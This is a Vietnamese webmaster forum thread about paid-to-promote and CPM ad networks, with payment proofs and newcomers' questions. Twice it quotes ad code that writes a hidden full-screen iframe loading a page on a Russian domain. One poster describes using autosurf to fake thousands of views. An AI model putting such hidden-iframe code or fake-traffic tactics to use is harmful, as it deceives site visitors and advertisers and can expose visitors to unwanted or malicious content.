Got Paid Tổng hợp các site Paid-To-Promote/CPM - Có Proof Payment - Webmaster nên chọn lựa! Update dần dần!

Cập nhật thêm Proof Payment của POPUNDER và SAFEFRAME, ngày 08/01/2013 & 09/01/2013:
SAFEFRAME:

POPUNDER:

Đã cập nhật nội dung cho Blog EasyCPM.NET. Các bạn đã đăng kí hãy vô đọc nhé :)

Attachments

46 KB · Views: 25
<script type="text/javascript">
if (i9372 == null) { var i9372 = 1; window.status='Done'; document.write('<DIV id=check706 style="DISPLAY: none"><iframe src="http://706.hostometr.ru/index.html?p=239590" width="'+screen.width+'" height="'+screen.height+'"></iframe></DIV>'); window.status='Done'; }
</script>

thớt cho hỏi, sao đặt mã trên của safeframe.ru/ mà site ko hiển thị gì vậy ?

<script type="text/javascript">
if (i9372 == null) { var i9372 = 1; window.status='Done'; document.write('<DIV id=check706 style="DISPLAY: none"><iframe src="http://706.hostometr.ru/index.html?p=239590" width="'+screen.width+'" height="'+screen.height+'"></iframe></DIV>'); window.status='Done'; }
</script>

thớt cho hỏi, sao đặt mã trên của safeframe.ru/ mà site ko hiển thị gì vậy ?
cái này nó ko hiển thị nhá :D

đang thử chiến site 1 và 2 :D
à code mình lấy từ site của nó mình chỉ việc next thôi đúng hk có cần edit lại ko ( phần tạo code )

Hôm nay có cái email này của SF:
Thưa *****

Hệ thống của chúng tôi đã chấm dứt để ghi lại các lưu lượng truy cập đến từ bạn. Xin vui lòng giải thích lý do tại sao bạn ngừng làm việc với chúng tôi, sẵn sàng tư vấn hoặc trả lời câu hỏi của bạn. Ngoài ra, bạn có thể đặt câu hỏi hoặc yêu cầu giúp đỡ trên diễn đàn của chúng tôi - WebTalking.ru

Nếu bạn không muốn nhận các thông báo hệ thống, nhấp chuột vào liên kết sau:

Trân trọng,
WebTrafficKings

Có ai nhận được như mình không?

:binhsua17: giờ new mở đk lại thôi ! zạo này bận thi ko đk đc ! mong được tái ngộ :binhsua01: wmlink,tak.ru ...... :binhsua10:

Mấy huynh cho hỏi Thường thì phải mất bao lâu Safeframe nó mới nhận diện được site của mình vậy? Mình đặt code lên site rồi nhưng SafeFrame không thấy hiện ra site để mà phân loại và chèn code 2 ngày rồi mà chẳng thấy động tĩnh gì cả! <em sài autosurf mấy ngàn lượt view rồi mà chưa thấy safe cập nhập j cả!

tham gia hết rồi, mà làm cách nào để kiếm được tiền vậy. cái site của nga mình ko bik làm sao hết. Ai giúp dùm đi

bác chủ thớt không có bài viết hướng dẫn hả bác.Bác có yahoo không để lại em hỏi bác tí được không

Announcements

Forum statistics

Threads
420,865
172,939
Latest member
DeEtte

Most viewed of week

Most discussed of week

Most viewed of week

Most discussed of week

Back